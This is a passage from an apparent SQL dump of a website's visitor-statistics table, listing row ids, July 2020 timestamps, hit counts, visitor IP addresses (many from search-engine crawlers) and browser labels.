.168.60.13','chrome'),(526292,1595794876,1,1,0,0,'66.249.70.70','chrome'),(526293,1595794940,1,1,0,0,'178.154.200.222','other'),(526294,1595794964,8,8,0,0,'185.11.82.228','other'),(526295,1595795361,1,1,0,0,'66.249.70.72','chrome'),(526296,1595795612,1,1,0,0,'157.55.39.208','other'),(526297,1595795635,2,2,0,0,'66.249.70.69','chrome'),(526298,1595795679,1,1,0,0,'213.180.203.16','other'),(526299,1595795897,1,1,0,0,'17.58.99.84','other'),(526300,1595796008,1,1,0,0,'173.252.111.117','other'),(526301,1595796203,1,1,0,0,'66.249.70.70','chrome'),(526302,1595796263,1,1,0,0,'157.55.39.72','other'),(526303,1595796283,1,1,0,0,'66.249.70.72','chrome'),(526304,1595796299,8,8,0,0,'185.11.82.228','other'),(526305,1595796573,2,2,0,0,'66.249.70.69','chrome'),(526306,1595797050,1,1,0,0,'66.249.64.38','chrome'),(526307,1595797197,2,2,0,0,'66.249.70.72','chrome'),(526308,1595797681,8,8,0,0,'185.11.82.228','other'),(526309,1595798105,3,3,0,0,'35.232.133.69','chrome'),(526310,1595798107,1,1,0,0,'35.232.133.69','other'),(526311,1595798135,1,1,0,0,'66.249.64.33','chrome'),(526312,1595798325,3,3,0,0,'35.194.62.127','chrome'),(526313,1595798326,1,1,0,0,'35.194.62.127','other'),(526314,1595798364,3,3,0,0,'35.238.43.5','chrome'),(526315,1595798365,1,1,0,0,'35.238.43.5','other'),(526316,1595798380,3,3,0,0,'35.192.74.211','chrome'),(526317,1595798381,1,1,0,0,'35.192.74.211','other'),(526318,1595798391,2,2,0,0,'34.67.187.46','chrome'),(526320,1595798392,1,1,0,0,'34.67.187.46','other'),(526321,1595798403,2,2,0,0,'35.239.61.9','chrome'),(526322,1595798405,1,1,0,0,'35.239.61.9','other'),(526323,1595799003,8,8,0,0,'185.11.82.228','other'),(526324,1595799678,2,2,0,0,'66.249.70.72','chrome'),(526325,1595800061,4,4,0,0,'66.249.70.70','chrome'),(526326,1595800068,1,1,0,0,'66.249.64.38','chrome'),(526327,1595800133,1,1,0,0,'66.249.70.69','chrome'),(526328,1595800382,8,8,0,0,'185.11.82.228','other'),(526329,1595800601,1,1,0,0,'66.249.70.72','chrome'),(526330,1595801778,8,8,0,0,'185.11.82.228','other'),(526331,1595801910,1,1,0,0,'198.38.82.11','chrome'),(526332,1595802711,3,3,0,0,'66.249.70.70','chrome'),(526333,1595802982,1,1,0,0,'66.249.70.72','chrome'),(526334,1595803076,1,1,0,0,'66.249.64.33','chrome'),(526335,1595803215,8,8,0,0,'185.11.82.228','other'),(526336,1595803623,2,2,0,0,'47.75.168.207','chrome'),(526337,1595804002,1,1,0,0,'8.29.198.25','other'),(526338,1595804047,2,2,0,0,'66.249.70.72','chrome'),(526339,1595804627,8,8,0,0,'185.11.82.228','other'),(526340,1595804950,1,1,0,0,'8.29.198.26','other'),(526341,1595805149,1,1,0,0,'157.55.39.72','other'),(526342,1595805260,1,1,0,0,'66.249.64.33','chrome'),(526343,1595805556,3,3,0,0,'66.249.70.69','chrome'),(526344,1595805631,1,1,0,0,'195.248.240.36','chrome'),(526345,1595805641,2,2,0,0,'188.166.218.146','chrome'),(526346,1595805699,1,1,0,0,'66.249.70.70','chrome'),(526347,1595806036,5,5,0,0,'66.249.70.72','chrome'),(526348,1595806053,8,8,0,0,'185.11.82.228','other'),(526349,1595806197,1,1,0,0,'213.180.203.16','other'),(526350,1595806435,1,1,0,0,'66.249.64.36','chrome'),(526351,1595806828,1,1,0,0,'5.61.250.112','chrome'),(526352,1595807498,8,8,0,0,'185.11.82.228','other'),(526353,1595807707,1,1,0,0,'62.205.134.182','other'),(526354,1595808228,1,1,0,0,'174.138.51.109','chrome'),(526355,1595808922,1,1,0,0,'66.249.70.70','chrome'),(526356,1595808961,8,8,0,0,'185.11.82.228','other'),(526357,1595808986,1,1,0,0,'66.249.70.69','chrome'),(526358,1595809087,1,1,0,0,'66.249.70.72','chrome'),(526359,1595810438,8,8,0,0,'185.11.82.228','other'),(526360,1595811205,1,1,0,0,'157.55.39.72','other'),(526361,1595811298,1,1,0,0,'66.249.70.72','chrome'),(526362,1595811548,2,2,0,0,'66.249.70.70','chrome'),(526363,1595811622,1,1,0,0,'87.236.20.169','chrome'),(526364,1595811924,8,8,0,0,'185.11.82.228','other'),(526365,1595811982,1,1,0,0,'66.249.64.33','chrome'),(526366,1595812454,2,2,0,0,'66.249.70.72','chrome'),(526367,1595812931,2,2,0,0,'66.249.70.70','chrome'),(526368,1595813367,5,5,0,0,'66.249.70.69','chrome'),(526369,1595813404,8,8,0,0,'185.11.82.228','other'),(526370,1595813565,1,1,0,0,'66.249.70.72','chrome'),(526371,1595813722,1,1,0,0,'66.249.64.36','chrome'),(526372,1595813981,1,1,0,0,'66.249.70.70','chrome'),(526373,1595814079,1,1,0,0,'66.249.64.38','chrome'),(526374,1595814482,1,1,0,0,'81.88.49.5','chrome'),(526375,1595814488,1,1,0,0,'81.88.49.37','chrome'),(526376,1595814530,1,1,0,0,'17.58.99.84','other'),(526377,1595814829,1,1,0,0,'8.29.198.26','other'),(526378,1595814886,8,8,0,0,'185.11.82.228','other'),(526379,1595814935,1,1,0,0,'66.249.70.72','chrome'),(526380,1595814944,1,1,0,0,'66.249.70.69','chrome'),(526381,1595814970,2,2,0,0,'66.249.70.70','chrome'),(526382,1595815141,1,1,0,0,'66.249.64.33','chrome'),(526383,1595815772,1,1,0,0,'8.29.198.25','other'),(526384,1595815896,2,2,0,0,'192.99.6.216','chrome'),(526385,1595816438,8,8,0,0,'185.11.82.228','other'),(526386,1595816652,1,1,0,0,'80.150.6.150','chrome'),(526387,1595816926,1,1,0,0,'66.249.70.72','chrome'),(526388,1595817337,2,2,0,0,'89.46.104.195','chrome'),(526389,1595817489,2,2,0,0,'51.68.11.195','chrome'),(526390,1595817547,1,1,0,0,'66.249.70.70','chrome'),(526391,1595817943,8,8,0,0,'185.11.82.228','other'),(526392,1595818802,1,1,0,0,'5.61.250.112','chrome'),(526393,1595819016,2,2,0,0,'66.249.70.70','chrome'),(526394,1595819059,1,0,1,0,'66.249.70.69',''),(526395,1595819065,2,2,0,0,'93.188.2.5','chrome'),(526396,1595819091,1,1,0,0,'66.249.70.69','chrome'),(526397,1595819176,2,2,0,0,'66.249.70.72','chrome'),(526398,1595819502,8,8,0,0,'185.11.82.228','other'),(526399,1595820479,2,2,0,0,'45.40.166.11','chrome'),(526400,1595820611,2,2,0,0,'66.249.70.69','chrome'),(526401,1595820624,1,1,0,0,'66.249.64.38','chrome'),(526402,1595820816,7,7,0,0,'195.88.242.232','firefox'),(526403,1595820818,1,1,0,0,'195.88.242.232','chrome'),(526404,1595821151,8,8,0,0,'185.11.82.228','other'),(526405,1595821213,2,2,0,0,'66.249.70.70','chrome'),(526406,1595821525,1,1,0,0,'69.171.249.23','other'),(526407,1595821526,1,1,0,0,'69.171.249.22','other'),(526408,1595822158,3,3,0,0,'91.208.99.2','chrome'),(526409,1595822222,1,1,0,0,'178.250.54.207','chrome'),(526410,1595822784,8,8,0,0,'185.11.82.228','other'),(526411,1595823127,1,1,0,0,'66.249.70.72','chrome'),(526412,1595823414,1,1,0,0,'66.249.64.36','chrome'),(526413,1595824056,1,1,0,0,'207.46.13.92','other'),(526414,1595824611,1,1,0,0,'131.220.6.152','chrome'),(526415,1595824656,1,0,1,0,'66.249.70.70',''),(526416,1595825098,2,2,0,0,'39.105.52.218','chrome'),(526417,1595825144,1,1,0,0,'185.5.236.191','chrome'),(526418,1595825181,1,1,0,0,'66.249.70.72','chrome'),(526419,1595825358,8,8,0,0,'185.11.82.228','other'),(526420,1595825659,1,1,0,0,'8.29.198.25','other'),(526421,1595825706,1,1,0,0,'62.205.134.182','other'),(526422,1595826505,8,8,0,0,'185.11.82.228','other'),(526423,1595826594,1,1,0,0,'8.29.198.27','other'),(526424,1595827713,8,8,0,0,'185.11.82.228','other'),(526425,1595828297,1,1,0,0,'91.196.177.46','chrome'),(526426,1595828298,1,1,0,0,'178.154.200.222','other'),(526427,1595828552,1,1,0,0,'78.46.76.29','chrome'),(526428,1595828909,8,8,0,0,'185.11.82.228','other'),(526429,1595829211,1,1,0,0,'66.249.70.69','chrome'),(526430,1595829842,1,1,0,0,'88.198.177.113','chrome'),(526431,1595830197,8,8,0,0,'185.11.82.228','other'),(526432,1595830809,1,1,0,0,'66.249.70.72','chrome'),(526433,1595830961,2,2,0,0,'66.249.70.70','chrome'),(526434,1595831348,1,1,0,0,'81.88.49.8','chrome'),(526435,1595831379,2,2,0,0,'207.46.13.91','other'),(526436,1595831427,8,8,0,0,'185.11.82.228','other'),(526437,1595831645,1,1,0,0,'91.196.178.177','chrome'),(526438,1595831666,1,1,0,0,'178.154.200.220','other'),(526439,1595831900,1,1,0,0,'66.249.70.72','chrome'),(526440,1595832707,8,8,0,0,'185.11.82.228','other'),(526441,1595832920,1,1,0,0,'94.199.60.207','chrome'),(526442,1595833193,1,1,0,0,'66.249.70.72','chrome'),(526443,1595833905,1,1,0,0,'66.249.70.70','chrome'),(526444,1595834046,8,8,0,0,'185.11.82.228','other'),(526445,1595835082,2,2,0,0,'91.196.178.170','chrome'),(526446,1595835214,1,1,0,0,'46.200.253.102','chrome'),(526447,1595835462,8,8,0,0,'185.11.82.228','other'),(526448,1595835962,1,1,0,0,'91.196.178.93','firefox'),(526449,1595836145,1,1,0,0,'66.249.70.70','chrome'),(526450,1595836484,1,1,0,0,'8.29.198.25','other'),(526451,1595836946,1,1,0,0,'91.196.178.93','firefox'),(526452,1595836966,8,8,0,0,'185.11.82.228','other'),(526453,1595837411,1,1,0,0,'8.29.198.26','other'),(526454,1595837589,1,1,0,0,'103.18.6.177','chrome'),(526455,1595837890,1,1,0,0,'91.196.178.93','firefox'),(526456,1595838101,1,1,0,0,'66.249.70.70','chrome'),(526457,1595838192,1,1,0,0,'52.188.125.130','chrome'),(526458,1595838456,8,8,0,0,'185.11.82.228','other'),(526459,1595838494,2,2,0,0,'66.249.70.69','chrome'),(526460,1595838577,1,1,0,0,'46.201.18.232','chrome'),(526461,1595838784,1,1,0,0,'91.196.178.93','chrome'),(526462,1595838989,2,2,0,0,'212.158.174.121','chrome'),(526463,1595839344,2,2,0,0,'66.249.70.72','chrome'),(526464,1595839395,1,1,0,0,'91.196.178.170','chrome'),(526465,1595839535,2,2,0,0,'66.249.70.69','chrome'),(526466,1595839918,2,2,0,0,'66.249.64.38','chrome'),(526467,1595840013,8,8,0,0,'185.11.82.228','other'),(526468,1595840168,1,1,0,0,'157.55.39.135','other'),(526469,1595840520,1,1,0,0,'91.196.178.170','chrome'),(526470,1595840655,2,2,0,0,'93.188.2.5','chrome'),(526471,1595840661,3,3,0,0,'91.208.99.2','chrome'),(526472,1595841519,8,8,0,0,'185.11.82.228','other'),(526473,1595841622,1,1,0,0,'40.88.21.235','other'),(526474,1595841624,1,1,0,0,'207.46.13.91','other'),(526475,1595841975,12,12,0,0,'105.209.227.190','chrome'),(526476,1595842189,1,1,0,0,'66.249.64.33','chrome'),(526477,1595842268,1,1,0,0,'66.249.70.70','chrome'),(526478,1595842778,1,1,0,0,'176.111.33.18','firefox'),(526479,1595842820,1,1,0,0,'66.249.70.69','chrome'),(526480,1595842964,1,1,0,0,'95.132.10.8','chrome'),(526481,1595843064,8,8,0,0,'185.11.82.228','other'),(526482,1595843079,1,1,0,0,'66.249.64.38','chrome'),(526483,1595843138,1,1,0,0,'66.249.64.33','chrome'),(526484,1595843334,1,1,0,0,'66.249.64.36','chrome'),(526485,1595843442,3,3,0,0,'66.249.70.72','chrome'),(526486,1595843531,1,1,0,0,'173.252.107.13','other'),(526487,1595843850,2,2,0,0,'191.252.51.234','chrome'),(526488,1595844039,1,1,0,0,'18.222.143.43','chrome'),(526489,1595844565,1,1,0,0,'66.249.70.70','chrome'),(526490,1595844644,1,1,0,0,'66.249.70.72','chrome'),(526491,1595844713,8,8,0,0,'185.11.82.228','other'),(526492,1595845220,1,1,0,0,'66.249.70.69','chrome'),(526493,1595845301,1,1,0,0,'157.55.39.147','other'),(526494,1595846493,8,8,0,0,'185.11.82.228','other'),(526495,1595846920,1,1,0,0,'178.20.153.14','chrome'),(526496,1595847313,1,1,0,0,'8.29.198.26','other'),(526497,1595847337,2,2,0,0,'66.249.70.70','chrome'),(526498,1595847340,2,1,1,0,'66.249.70.72',''),(526499,1595847445,1,1,0,0,'46.21.198.188','chrome'),(526500,1595847617,1,1,0,0,'91.196.178.141','chrome'),(526501,1595847904,1,1,0,0,'66.249.64.36','chrome'),(526502,1595847993,1,1,0,0,'109.74.154.72','chrome'),(526503,1595848231,1,1,0,0,'8.29.198.26','other'),(526504,1595848352,8,8,0,0,'185.11.82.228','other'),(526505,1595849044,1,1,0,0,'17.58.99.84','other'),(526506,1595849079,1,1,0,0,'46.211.36.194','other'),(526507,1595849304,1,1,0,0,'66.249.70.69','chrome'),(526508,1595849333,1,1,0,0,'66.249.70.70','chrome'),(526509,1595850016,1,1,0,0,'157.55.39.147','other'),(526510,1595850253,8,8,0,0,'185.11.82.228','other'),(526511,1595850577,2,2,0,0,'66.249.70.69','chrome'),(526512,1595850831,1,1,0,0,'93.187.207.69','chrome'),(526513,1595850930,1,1,0,0,'207.46.13.139','other'),(526514,1595851060,1,1,0,0,'178.154.200.222','other'),(526515,1595851484,3,3,0,0,'186.234.80.248','chrome'),(526516,1595852180,8,8,0,0,'185.11.82.228','other'),(526517,1595852252,1,1,0,0,'66.249.64.36','chrome'),(526518,1595852466,2,2,0,0,'207.46.13.139','other'),(526519,1595852560,1,1,0,0,'212.3.104.152','chrome'),(526520,1595852599,1,1,0,0,'66.249.93.24','chrome'),(526521,1595852636,1,1,0,0,'51.68.11.227','chrome'),(526522,1595852702,3,3,0,0,'66.249.70.69','chrome'),(526523,1595852705,1,1,0,0,'91.196.178.189','chrome'),(526524,1595853629,1,1,0,0,'17.58.99.84','other'),(526525,1595853681,1,1,0,0,'66.249.70.72','chrome'),(526526,1595853683,1,1,0,0,'91.196.178.72','chrome'),(526527,1595854146,8,8,0,0,'185.11.82.228','other'),(526528,1595854312,2,2,0,0,'157.230.255.113','chrome'),(526529,1595854611,2,2,0,0,'207.46.13.139','other'),(526530,1595855166,1,1,0,0,'66.249.70.70','chrome'),(526531,1595855177,1,1,0,0,'91.196.178.170','chrome'),(526532,1595855369,2,2,0,0,'66.249.70.72','chrome'),(526533,1595855377,1,1,0,0,'207.46.13.91','other'),(526534,1595856164,1,1,0,0,'66.249.70.70','chrome'),(526535,1595856349,8,8,0,0,'185.11.82.228','other'),(526536,1595856377,1,1,0,0,'207.46.13.139','other'),(526537,1595856500,1,1,0,0,'157.55.39.115','other'),(526538,1595856550,1,1,0,0,'66.249.70.69','chrome'),(526539,1595856931,2,2,0,0,'52.12.55.13','chrome'),(526540,1595857469,1,1,0,0,'66.249.70.72','chrome'),(526541,1595857830,1,1,0,0,'46.164.130.94','chrome'),(526542,1595858147,1,1,0,0,'8.29.198.27','other'),(526543,1595858787,2,2,0,0,'207.46.13.139','other'),(526544,1595858802,3,3,0,0,'66.249.70.72','chrome'),(526545,1595858813,4,4,0,0,'66.249.70.70','chrome'),(526546,1595858868,3,3,0,0,'66.249.70.69','chrome'),(526547,1595859052,1,1,0,0,'8.29.198.26','other'),(526548,1595859306,8,8,0,0,'185.11.82.228','other'),(526549,1595859401,1,1,0,0,'66.249.64.33','chrome'),(526550,1595859924,1,1,0,0,'207.46.13.91','other'),(526551,1595860783,5,5,0,0,'66.249.70.69','chrome'),(526552,1595860845,1,1,0,0,'66.249.70.70','chrome'),(526553,1595860937,1,1,0,0,'66.249.64.36','chrome'),(526554,1595860939,1,1,0,0,'66.249.70.72','chrome'),(526555,1595860968,1,1,0,0,'207.46.13.234','other'),(526556,1595861715,1,1,0,0,'91.208.99.2','chrome'),(526557,1595862131,1,1,0,0,'66.249.70.69','chrome'),(526558,1595862284,7,7,0,0,'52.138.87.174','other'),(526559,1595862357,1,1,0,0,'66.249.70.70','chrome'),(526560,1595862592,8,8,0,0,'185.11.82.228','other'),(526561,1595862762,1,1,0,0,'157.55.39.115','other'),(526562,1595863125,1,1,0,0,'88.99.172.137','chrome'),(526563,1595863498,1,1,0,0,'66.249.70.69','chrome'),(526564,1595863715,1,1,0,0,'207.46.13.139','other'),(526565,1595864388,1,1,0,0,'81.88.49.52','chrome'),(526566,1595864392,1,1,0,0,'81.88.49.28','chrome'),(526567,1595864426,2,2,0,0,'66.249.70.70','chrome'),(526568,1595864508,4,4,0,0,'66.249.70.69','chrome'),(526569,1595864598,1,1,0,0,'66.249.70.72','chrome'),(526570,1595864699,1,1,0,0,'157.55.39.147','other'),(526571,1595865844,8,8,0,0,'185.11.82.228','other'),(526572,1595865899,3,3,0,0,'66.249.70.69','chrome'),(526573,1595865960,1,1,0,0,'66.249.70.70','chrome'),(526574,1595866102,1,1,0,0,'54.171.102.235','chrome'),(526575,1595866198,2,2,0,0,'66.249.70.72','chrome'),(526576,1595866484,1,1,0,0,'207.46.13.139','other'),(526577,1595867196,1,1,0,0,'185.10.99.21','chrome'),(526578,1595867472,1,1,0,0,'66.249.70.72','chrome'),(526579,1595867562,6,6,0,0,'66.249.70.69','chrome'),(526580,1595867657,3,3,0,0,'66.249.70.70','chrome'),(526581,1595867781,1,1,0,0,'207.46.13.234','other'),(526582,1595868012,2,2,0,0,'207.46.13.139','other'),(526583,1595868036,1,1,0,0,'157.55.39.115','other'),(526584,1595868173,1,1,0,0,'66.249.64.36','chrome'),(526585,1595868538,3,3,0,0,'66.249.70.69','chrome'),(526586,1595868638,1,1,0,0,'66.249.64.38','chrome'),(526587,1595868970,1,1,0,0,'8.29.198.27','other'),(526588,1595869015,2,2,0,0,'207.46.13.139','other'),(526589,1595869263,8,8,0,0,'185.11.82.228','other'),(526590,1595869871,1,1,0,0,'8.29.198.26','other'),(526591,1595869933,1,1,0,0,'66.249.70.72','chrome'),(526592,1595869963,1,1,0,0,'66.249.70.69','chrome'),(526593,1595870165,1,1,0,0,'207.46.13.161','other'),(526594,1595870240,1,1,0,0,'66.249.70.70','chrome'),(526595,1595871331,1,1,0,0,'66.249.64.36','chrome'),(526596,1595871668,3,3,0,0,'66.249.70.72','chrome'),(526597,1595871926,1,1,0,0,'88.99.26.12','chrome'),(526598,1595872344,1,1,0,0,'66.249.70.69','chrome'),(526599,1595872422,1,1,0,0,'66.249.70.70','chrome'),(526600,1595872699,1,1,0,0,'95.47.14.6','chrome'),(526601,1595873138,1,1,0,0,'85.25.237.25','chrome'),(526602,1595873218,1,1,0,0,'178.154.200.222','chrome'),(526603,1595873241,1,1,0,0,'178.154.200.222','other'),(526604,1595873254,2,2,0,0,'185.220.100.254','other'),(526605,1595873258,1,1,0,0,'185.220.100.254','chrome'),(526606,1595873939,1,1,0,0,'88.155.64.19','chrome'),(526607,1595874050,1,1,0,0,'66.249.64.38','chrome'),(526608,1595874376,1,1,0,0,'66.249.70.69','chrome'),(526609,1595874419,1,1,0,0,'17.58.99.84','other'),(526610,1595874754,1,1,0,0,'185.15.56.22','other'),(526611,1595875334,8,8,0,0,'185.11.82.228','other'),(526612,1595875340,1,1,0,0,'91.196.178.13','chrome'),(526613,1595875512,2,2,0,0,'66.249.70.72','chrome'),(526614,1595876138,1,1,0,0,'66.249.70.70','chrome'),(526615,1595876530,1,0,1,0,'66.249.70.69',''),(526616,1595877294,2,2,0,0,'66.249.70.70','chrome'),(526617,1595877841,2,2,0,0,'207.46.13.139','other'),(526618,1595877968,2,2,0,0,'207.46.13.104','other'),(526619,1595878559,1,1,0,0,'66.249.64.33','chrome'),(526620,1595878793,1,1,0,0,'66.249.70.69','chrome'),(526621,1595878891,2,2,0,0,'66.249.70.70','chrome'),(526622,1595879163,1,1,0,0,'185.21.41.145','chrome'),(526623,1595879314,1,1,0,0,'94.247.176.153','chrome'),(526624,1595879357,2,2,0,0,'47.89.29.162','chrome'),(526625,1595879429,2,2,0,0,'66.249.64.36','chrome'),(526626,1595879482,1,1,0,0,'207.46.13.139','other'),(526627,1595879799,2,2,0,0,'8.29.198.25','other'),(526628,1595879808,1,1,0,0,'66.249.70.70','chrome'),(526629,1595879882,2,2,0,0,'66.249.64.38','chrome'),(526630,1595880096,2,2,0,0,'66.249.70.69','chrome'),(526631,1595880264,1,1,0,0,'66.249.70.72','chrome'),(526632,1595880576,1,1,0,0,'17.58.99.84','other'),(526633,1595880720,1,1,0,0,'66.249.70.70','chrome'),(526634,1595880940,1,1,0,0,'66.249.64.36','chrome'),(526635,1595881199,2,2,0,0,'66.249.70.69','chrome'),(526636,1595881617,1,1,0,0,'207.46.13.139','other'),(526637,1595881788,2,2,0,0,'66.249.64.33','chrome'),(526638,1595882157,2,2,0,0,'66.249.70.72','chrome'),(526639,1595882175,1,1,0,0,'66.249.64.38','chrome'),(526640,1595882302,1,1,0,0,'66.249.70.69','chrome'),(526641,1595882350,3,3,0,0,'66.249.70.70','chrome'),(526642,1595882363,2,2,0,0,'208.109.10.223','chrome'),(526643,1595882655,2,2,0,0,'95.213.141.126','opera'),(526644,1595883013,1,1,0,0,'157.55.39.141','other'),(526645,1595883511,1,1,0,0,'66.249.70.72','chrome'),(526646,1595883613,3,3,0,0,'66.249.70.69','chrome'),(526647,1595883667,1,1,0,0,'91.196.178.125','chrome'),(526648,1595883894,1,1,0,0,'66.249.70.70','chrome'),(526649,1595885071,2,2,0,0,'66.249.70.69','chrome'),(526650,1595885147,1,1,0,0,'66.249.70.72','chrome'),(526651,1595885236,1,1,0,0,'66.249.64.33','chrome'),(526652,1595885442,2,2,0,0,'66.249.70.70','chrome'),(526653,1595885471,1,1,0,0,'176.8.250.231','chrome'),(526654,1595886126,1,1,0,0,'66.249.64.38','chrome'),(526655,1595886220,1,1,0,0,'2.47.39.220','other'),(526656,1595886730,4,4,0,0,'66.249.70.70','chrome'),(526657,1595886810,4,4,0,0,'66.249.70.72','chrome'),(526658,1595887004,6,6,0,0,'66.249.70.69','chrome'),(526659,1595887014,1,1,0,0,'207.46.13.139','other'),(526660,1595887390,1,1,0,0,'66.249.64.33','chrome'),(526661,1595887701,8,8,0,0,'185.11.82.228','other'),(526662,1595887788,1,1,0,0,'66.249.70.72','chrome'),(526663,1595888214,1,1,0,0,'17.58.99.84','other'),(526664,1595888767,8,8,0,0,'185.11.82.228','other'),(526665,1595889237,1,1,0,0,'207.46.13.139','other'),(526666,1595889630,1,1,0,0,'66.249.64.38','chrome'),(526667,1595889709,2,2,0,0,'66.249.70.72','chrome'),(526668,1595889752,3,3,0,0,'66.249.70.69','chrome'),(526669,1595889822,8,8,0,0,'185.11.82.228','other'),(526670,1595890050,2,2,0,0,'66.249.70.70','chrome'),(526671,1595890235,1,1,0,0,'17.58.99.84','other'),(526672,1595890624,1,1,0,0,'8.29.198.26','other'),(526673,1595890722,2,2,0,0,'66.249.70.72','chrome'),(526674,1595890858,8,8,0,0,'185.11.82.228','other'),(526675,1595891191,5,5,0,0,'66.249.70.70','chrome'),(526676,1595891408,3,3,0,0,'17.58.99.84','other'),(526677,1595891509,1,1,0,0,'8.29.198.27','other'),(526678,1595891787,1,1,0,0,'66.249.70.72','chrome'),(526679,1595891927,8,8,0,0,'185.11.82.228','other'),(526680,1595892893,1,1,0,0,'66.249.70.69','chrome'),(526681,1595892969,2,2,0,0,'66.249.70.72','chrome'),(526682,1595892985,8,8,0,0,'185.11.82.228','other'),(526683,1595893155,1,1,0,0,'66.249.64.38','chrome'),(526684,1595893833,1,1,0,0,'17.58.99.84','other'),(526685,1595894041,8,8,0,0,'185.11.82.228','other'),(526686,1595894108,1,1,0,0,'62.205.134.182','other'),(526687,1595894192,2,2,0,0,'66.249.70.72','chrome'),(526688,1595894653,2,2,0,0,'66.249.70.70','chrome'),(526689,1595894808,1,1,0,0,'66.249.64.33','chrome'),(526690,1595894928,2,2,0,0,'66.249.70.69','chrome'),(526691,1595895101,8,8,0,0,'185.11.82.228','other'),(526692,1595895297,1,1,0,0,'46.211.38.140','other'),(526693,1595895309,2,2,0,0,'66.249.70.72','chrome'),(526694,1595895435,1,1,0,0,'34.222.207.240','chrome'),(526695,1595895547,1,1,0,0,'34.220.56.123','other'),(526696,1595896186,8,8,0,0,'185.11.82.228','other'),(526697,1595896260,1,1,0,0,'66.249.70.69','chrome'),(526698,1595896391,2,2,0,0,'66.249.64.38','chrome'),(526699,1595896458,3,3,0,0,'66.249.70.70','chrome'),(526700,1595896740,2,2,0,0,'66.249.70.72','chrome'),(526701,1595897268,8,8,0,0,'185.11.82.228','other'),(526702,1595898337,8,8,0,0,'185.11.82.228','other'),(526703,1595898381,1,1,0,0,'207.46.13.139','other'),(526704,1595898465,1,1,0,0,'66.249.64.33','chrome'),(526705,1595898880,2,2,0,0,'157.55.39.81','other'),(526706,1595899117,2,2,0,0,'66.249.70.72','chrome'),(526707,1595899304,1,1,0,0,'66.249.64.36','chrome'),(526708,1595899416,8,8,0,0,'185.11.82.228','other'),(526709,1595899710,1,1,0,0,'66.249.64.33','chrome'),(526710,1595899972,2,2,0,0,'66.249.70.69','chrome'),(526711,1595900330,2,2,0,0,'66.249.70.70','chrome'),(526712,1595900383,1,1,0,0,'209.17.97.106','other'),(526713,1595900478,1,1,0,0,'157.55.39.81','other'),(526714,1595900520,8,8,0,0,'185.11.82.228','other'),(526715,1595900536,2,2,0,0,'66.249.70.72','chrome'),(526716,1595901133,2,2,0,0,'66.249.70.69','chrome'),(526717,1595901453,2,2,0,0,'8.29.198.26','other'),(526718,1595901564,1,1,0,0,'45.85.111.137','chrome'),(526719,1595901630,8,8,0,0,'185.11.82.228','other'),(526720,1595902743,8,8,0,0,'185.11.82.228','other'),(526721,1595903172,1,1,0,0,'66.249.70.78','chrome'),(526722,1595903426,1,1,0,0,'66.249.64.33','chrome'),(526723,1595903490,2,2,0,0,'66.249.70.70','chrome'),(526724,1595903844,8,8,0,0,'185.11.82.228','other'),(526725,1595903914,1,1,0,0,'5.45.207.118','other'),(526726,1595904615,3,3,0,0,'66.249.70.72','chrome'),(526727,1595904984,1,1,0,0,'66.249.64.38','chrome'),(526728,1595904992,2,2,0,0,'66.249.70.69','chrome'),(526729,1595904994,8,8,0,0,'185.11.82.228','other'),(526730,1595905577,3,3,0,0,'66.249.70.72','chrome'),(526731,1595905591,7,7,0,0,'173.249.24.3','other'),(526732,1595905668,6,6,0,0,'66.249.70.70','chrome'),(526733,1595905930,2,2,0,0,'66.249.70.69','chrome'),(526734,1595906107,8,8,0,0,'185.11.82.228','other'),(526735,1595906598,2,2,0,0,'66.249.70.72','chrome'),(526736,1595906614,5,5,0,0,'66.249.70.70','chrome'),(526737,1595907127,1,1,0,0,'178.154.200.222','other'),(526738,1595907229,8,8,0,0,'185.11.82.228','other'),(526739,1595907994,2,2,0,0,'66.249.64.33','chrome'),(526740,1595908373,8,8,0,0,'185.11.82.228','other'),(526741,1595908399,2,2,0,0,'207.46.13.139','other'),(526742,1595908459,1,1,0,0,'66.249.70.69','chrome'),(526743,1595908606,2,2,0,0,'66.249.70.72','chrome'),(526744,1595908982,1,1,0,0,'34.78.107.246','other'),(526745,1595909512,8,8,0,0,'185.11.82.228','other'),(526746,1595909909,2,2,0,0,'51.68.11.215','chrome'),(526747,1595910258,1,1,0,0,'131.220.6.152','chrome'),(526748,1595910283,1,1,0,0,'66.249.64.36','chrome'),(526749,1595910438,4,4,0,0,'66.249.70.70','chrome'),(526750,1595910506,1,1,0,0,'178.154.200.222','other'),(526751,1595911246,1,1,0,0,'178.250.54.207','chrome'),(526752,1595911328,4,4,0,0,'66.249.70.69','chrome'),(526753,1595911854,8,8,0,0,'185.11.82.228','other'),(526754,1595912081,1,1,0,0,'62.205.134.182','other'),(526755,1595912108,2,2,0,0,'66.249.70.72','chrome'),(526756,1595912133,2,2,0,0,'66.249.70.70','chrome'),(526757,1595912220,1,1,0,0,'17.58.99.84','other'),(526758,1595912282,1,1,0,0,'8.29.198.27','other'),(526759,1595912470,1,1,0,0,'66.249.64.36','chrome'),(526760,1595912684,4,4,0,0,'66.249.70.69','chrome'),(526761,1595912695,3,3,0,0,'45.248.68.69','chrome'),(526762,1595912906,8,8,0,0,'185.11.82.228','other'),(526763,1595913010,1,1,0,0,'66.249.70.72','chrome'),(526764,1595913161,1,1,0,0,'8.29.198.26','other'),(526765,1595913642,1,1,0,0,'207.46.13.139','other'),(526766,1595913890,2,2,0,0,'66.249.70.70','chrome'),(526767,1595913909,1,1,0,0,'66.249.64.36','chrome'),(526768,1595914001,1,1,0,0,'66.249.70.69','chrome'),(526769,1595914015,8,8,0,0,'185.11.82.228','other'),(526770,1595914298,3,3,0,0,'66.249.70.72','chrome'),(526771,1595914709,2,2,0,0,'193.202.110.26','chrome'),(526772,1595915027,8,8,0,0,'185.11.82.228','other'),(526773,1595915298,1,1,0,0,'176.111.33.18','firefox'),(526774,1595915481,3,3,0,0,'66.249.70.69','chrome'),(526775,1595915483,1,1,0,0,'66.249.64.38','chrome'),(526776,1595915487,2,2,0,0,'66.249.70.70','chrome'),(526777,1595915544,1,1,0,0,'66.249.70.72','chrome'),(526778,1595915875,1,1,0,0,'78.24.179.226','chrome'),(526779,1595915953,1,1,0,0,'37.251.155.42','chrome'),(526780,1595916006,1,1,0,0,'66.249.64.33','chrome'),(526781,1595916094,8,8,0,0,'185.11.82.228','other'),(526782,1595916325,1,1,0,0,'207.46.13.98','other'),(526783,1595916570,2,2,0,0,'129.226.69.89','chrome'),(526784,1595916747,1,1,0,0,'66.249.70.72','chrome'),(526785,1595916834,1,1,0,0,'192.71.142.35','other'),(526786,1595916865,1,1,0,0,'178.154.200.222','other'),(526787,1595917113,1,1,0,0,'66.249.64.36','chrome'),(526788,1595917126,2,2,0,0,'